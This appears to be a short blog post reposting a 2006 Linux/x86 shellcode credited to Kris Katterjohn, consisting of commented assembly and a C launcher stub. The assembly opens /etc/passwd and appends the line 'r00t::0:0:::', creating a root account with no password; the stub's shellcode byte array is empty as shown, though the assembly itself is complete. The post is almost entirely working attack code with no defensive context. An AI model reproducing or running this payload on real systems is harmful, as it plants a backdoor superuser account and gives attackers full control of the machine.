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Rave's Blog

Exploit on linux 86

/* By Kris Katterjohn 11/14/2006
* 69 byte shellcode to add root user 'r00t' with no password to /etc/passwd
* for Linux/x86
* section .text
*      global _start
* _start:
* ; open("/etc//passwd", O_WRONLY | O_APPEND)
*      push byte 5
*      pop eax
*      xor ecx, ecx
*      push ecx
*      push 0x64777373
*      push 0x61702f2f
*      push 0x6374652f
*      mov ebx, esp
*      mov cx, 02001Q
*      int 0x80
*      mov ebx, eax
* ; write(ebx, "r00t::0:0:::", 12)
*      push byte 4
*      pop eax
*      xor edx, edx
*      push edx
*      push 0x3a3a3a30
*      push 0x3a303a3a
*      push 0x74303072
*      mov ecx, esp
*      push byte 12
*      pop edx
*      int 0x80
* ; close(ebx)
*      push byte 6
*      pop eax
*      int 0x80
* ; exit()
*      push byte 1
*      pop eax
*      int 0x80

      char shellcode[] =

      (*(void (*)()) shellcode)();

// [2006-11-17]

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